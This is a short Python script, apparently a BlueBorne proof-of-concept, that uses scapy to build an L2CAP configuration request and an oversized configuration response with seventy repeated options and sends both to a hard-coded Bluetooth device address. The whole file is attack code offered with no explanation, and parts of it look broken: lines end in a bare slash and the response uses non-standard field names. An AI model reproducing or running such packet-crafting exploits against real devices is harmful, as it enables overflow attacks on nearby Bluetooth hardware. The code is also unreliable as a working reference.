bluebornexploit.py

from scapy.all import *

pkt = L2CAP_CmdHdr(code=4) /
L2CAP_ConfReq(type=0x06, length=16, identifier=1, servicetype=0x0, sdusize=0xffff, sduarrtime=0xffffffff,
              accesslat=0xffffffff, flushtime=0xffffffff)

pkt1 = L2CAP_CmdHdr(code=5) /
L2CAP_ConfResp(result=0x04, type0=1, length0=2, option0=2000, type1=1, length1=2, option1=2000, type2=1, length2=2,
               option2=2000, type3=1, length3=2, option3=2000, type4=1, length4=2, option4=2000, type5=1, length5=2,
               option5=2000, type6=1, length6=2, option6=2000, type7=1, length7=2, option7=2000, type8=1, length8=2,
               option8=2000, type9=1, length9=2, option9=2000, type10=1, length10=2, option10=2000, type11=1,
               length11=2, option11=2000, type12=1, length12=2, option12=2000, type13=1, length13=2, option13=2000,
               type14=1, length14=2, option14=2000, type15=1, length15=2, option15=2000, type16=1, length16=2,
               option16=2000, type17=1, length17=2, option17=2000, type18=1, length18=2, option18=2000, type19=1,
               length19=2, option19=2000, type20=1, length20=2, option20=2000, type21=1, length21=2, option21=2000,
               type22=1, length22=2, option22=2000, type23=1, length23=2, option23=2000, type24=1, length24=2,
               option24=2000, type25=1, length25=2, option25=2000, type26=1, length26=2, option26=2000, type27=1,
               length27=2, option27=2000, type28=1, length28=2, option28=2000, type29=1, length29=2, option29=2000,
               type30=1, length30=2, option30=2000, type31=1, length31=2, option31=2000, type32=1, length32=2,
               option32=2000, type33=1, length33=2, option33=2000, type34=1, length34=2, option34=2000, type35=1,
               length35=2, option35=2000, type36=1, length36=2, option36=2000, type37=1, length37=2, option37=2000,
               type38=1, length38=2, option38=2000, type39=1, length39=2, option39=2000, type40=1, length40=2,
               option40=2000, type41=1, length41=2, option41=2000, type42=1, length42=2, option42=2000, type43=1,
               length43=2, option43=2000, type44=1, length44=2, option44=2000, type45=1, length45=2, option45=2000,
               type46=1, length46=2, option46=2000, type47=1, length47=2, option47=2000, type48=1, length48=2,
               option48=2000, type49=1, length49=2, option49=2000, type50=1, length50=2, option50=2000, type51=1,
               length51=2, option51=2000, type52=1, length52=2, option52=2000, type53=1, length53=2, option53=2000,
               type54=1, length54=2, option54=2000, type55=1, length55=2, option55=2000, type56=1, length56=2,
               option56=2000, type57=1, length57=2, option57=2000, type58=1, length58=2, option58=2000, type59=1,
               length59=2, option59=2000, type60=1, length60=2, option60=2000, type61=1, length61=2, option61=2000,
               type62=1, length62=2, option62=2000, type63=1, length63=2, option63=2000, type64=1, length64=2,
               option64=2000, type65=1, length65=2, option65=2000, type66=1, length66=2, option66=2000, type67=1,
               length67=2, option67=2000, type68=1, length68=2, option68=2000, type69=1, length69=2, option69=2000)

bt = BluetoothL2CAPSocket("00:1A:7D:DA:71:13")

bt.send(pkt)
bt.send(pkt1)